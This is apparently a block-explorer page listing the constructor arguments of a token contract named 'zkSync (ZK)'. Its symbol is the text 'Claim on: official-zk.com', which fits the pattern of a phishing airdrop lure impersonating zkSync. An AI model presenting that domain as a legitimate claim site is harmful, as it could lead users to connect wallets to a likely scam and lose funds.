000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000019471fe6a595bad921ece08000000000000000000000000000000005a7d6b2f92c77fad6ccabd7ee0624e64907eaf3e000000000000000000000000000000000000000000000000000000000000000b7a6b53796e6320285a4b290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000019436c61696d206f6e3a206f6666696369616c2d7a6b2e636f6d00000000000000
-----Decoded View---------------
Arg [0] : name_ (string): zkSync (ZK)
Arg [1] : symbol_ (string): Claim on: official-zk.com
Arg [2] : constAmount_ (uint256): 2100000000000000000000000000000000000
Arg [3] : from_ (address): 0x5A7d6b2F92C77FAD6CCaBd7EE0624E64907Eaf3E
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 00000000000000000000000000000000019471fe6a595bad921ece0800000000
Arg [3] : 0000000000000000000000005a7d6b2f92c77fad6ccabd7ee0624e64907eaf3e
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [5] : 7a6b53796e6320285a4b29000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000019
Arg [7] : 436c61696d206f6e3a206f6666696369616c2d7a6b2e636f6d00000000000000
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 35 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.